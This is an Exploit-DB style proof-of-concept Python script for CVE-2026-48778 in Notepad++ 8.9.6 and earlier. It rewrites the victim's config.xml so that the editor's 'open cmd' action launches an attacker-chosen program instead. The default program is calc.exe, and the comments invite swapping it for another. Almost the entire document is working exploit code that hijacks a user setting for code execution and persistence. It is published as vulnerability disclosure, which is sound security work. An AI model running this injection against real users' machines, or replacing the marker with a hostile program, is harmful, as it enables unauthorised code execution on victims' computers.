# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution via config.xml (CVE-2026-48778)
# Exploit DB: https://www.exploit-db.com/exploits/52606
# Date: 2026-05-30
# Exploit Author: Kavin Jindal (Avyukt Security)
# Contact: https://www.linkedin.com/in/kavin-jindal/
# Vendor Homepage: https://notepad-plus-plus.org
# Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/
# Version: <= 8.9.6
# Tested on: Windows 10/11
# CVE: CVE-2026-48778
# Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9

import os
import shutil
import sys
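# Value written into config.xml. "calc.exe" is a harmless marker; swap it for
# another program to demonstrate a different effect. No line ending here: the
# ending of the line being replaced/inserted before is reused, so CRLF and LF
# files stay consistent.
PAYLOAD = b'<GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>'

# Markers scanned for in config.xml. An existing interpreter entry is replaced
# in place; failing that, the payload is inserted just before the closing tag.
TARGET_OPEN = b'<GUIConfig name="commandLineInterpreter">'
TARGET_CLOSE = b"</GUIConfigs>"

RULE = "====================================================================="

BANNER = r'''
  ______   ______  ___  ___  ___  ____     ____ ___ ___________ 
 / ___/ | / / __/ |_  |/ _ \|_  |/ __/____/ / /( _ )_  /_  ( _ )
/ /__ | |/ / _/  / __// // / __// _ \/___/_  _/ _  |/ / / / _  |
\___/ |___/___/ /____/\___/____/\___/     /_/ \___//_/ /_/\___/ 
                                                                

'''


def banner() -> None:
    """Print the ASCII-art header followed by the PoC summary lines."""
    print(BANNER)
    print(RULE)
    print("[+] A PoC for CVE 2026-48778 discovered in Notepad++.")
    print("[+] Affected versions <= 8.9.6")
    print("[+] Built by Kavin Jindal")
    print("[+] Github: https://github.com/kavin-jindal/CVE-2026-48778-PoC")
    print("[+] ExploitDB: https://www.exploit-db.com/exploits/52606")
    print(RULE + "\n")


def inject_payload(lines: list[bytes], payload: bytes = PAYLOAD) -> list[bytes]:
    """Return a copy of *lines* with the commandLineInterpreter entry set to *payload*.

    The file is scanned top to bottom. The first line containing an existing
    ``<GUIConfig name="commandLineInterpreter">`` entry is replaced wholesale
    (keeping its leading whitespace and line ending); if none is met before
    the first ``</GUIConfigs>`` line, the payload is inserted immediately
    before that closing tag instead. Whichever marker appears first wins,
    which is the same precedence the original scan had.

    Args:
        lines: the config file split into lines, as raw bytes (line endings
            included). Working on bytes keeps the file's encoding and
            CRLF/LF convention untouched.
        payload: the replacement ``<GUIConfig>`` element, without line ending.

    Returns:
        A new list; *lines* is not modified.

    Raises:
        ValueError: neither marker was found, so there is nowhere to inject.
    """
    patched = list(lines)
    for idx, line in enumerate(patched):
        stripped = line.lstrip()
        indent = line[: len(line) - len(stripped)]
        eol = b"\r\n" if line.endswith(b"\r\n") else b"\n"
        if TARGET_OPEN in line:
            patched[idx] = indent + payload + eol
            return patched
        if TARGET_CLOSE in line:
            patched.insert(idx, indent + payload + eol)
            return patched
    raise ValueError(
        'no <GUIConfig name="commandLineInterpreter"> entry or </GUIConfigs> tag found'
    )


def main() -> int:
    """Locate the current user's Notepad++ config.xml and inject the payload.

    This only demonstrates impact: it needs write access to
    ``%APPDATA%\\Notepad++\\config.xml``, i.e. it runs as (or already has a
    write primitive into the profile of) the victim user. A copy of the
    untouched file is kept as ``config.xml.bak`` the first time the script
    runs, so the change can be reverted after testing.

    Returns:
        Process exit status: 0 on success, 1 on any precondition failure.
    """
    banner()

    # os.environ[...] would raise KeyError before the emptiness check could
    # ever run; .get() lets both "unset" and "empty" reach the message.
    appdata = os.environ.get("APPDATA")
    if not appdata:
        print("[!] APPDATA environment variable not found, exiting..")
        return 1

    config_path = os.path.join(appdata, "Notepad++", "config.xml")
    if not os.path.exists(config_path):
        # Previously this fell through to open() and died with a traceback.
        print("config.xml not found. Ensure Notepad++ is installed and has been launched atleast once.")
        return 1
    print("[+] Found config.xml at ==>", config_path)

    # Binary mode: the file is rewritten byte-for-byte apart from the one
    # injected line, regardless of its declared encoding or line endings.
    with open(config_path, "rb") as fh:
        lines = fh.readlines()

    try:
        patched = inject_payload(lines)
    except ValueError:
        print("\n[!] Payload injection failed.")
        return 1
    print("\n[!] Injecting payload..")

    # Keep the pristine config so the test can be undone; never overwrite an
    # existing backup, which may already be the clean copy from a prior run.
    backup_path = config_path + ".bak"
    if not os.path.exists(backup_path):
        shutil.copy2(config_path, backup_path)
        print("[+] Original config backed up to ==>", backup_path)

    with open(config_path, "wb") as fh:
        fh.writelines(patched)

    print("\n[+] Payload injected successfully!")
    # NOTE(review): Notepad++ is believed to rewrite config.xml when it exits,
    # so run this with the editor closed or the injected value may be lost
    # before it is ever read - confirm against the advisory.
    print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd")
    print("[+] Calc.exe will launch instead of cmd.")
    return 0


if __name__ == "__main__":
    sys.exit(main())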